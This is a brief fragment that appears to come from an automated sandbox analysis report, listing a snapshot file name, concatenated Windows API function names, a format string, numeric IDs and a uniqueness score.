                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                • String ID: menu_%d
                                                • API String ID: 1129539653-2417748251
                                                Uniqueness

                                                Uniqueness Score: -1.00%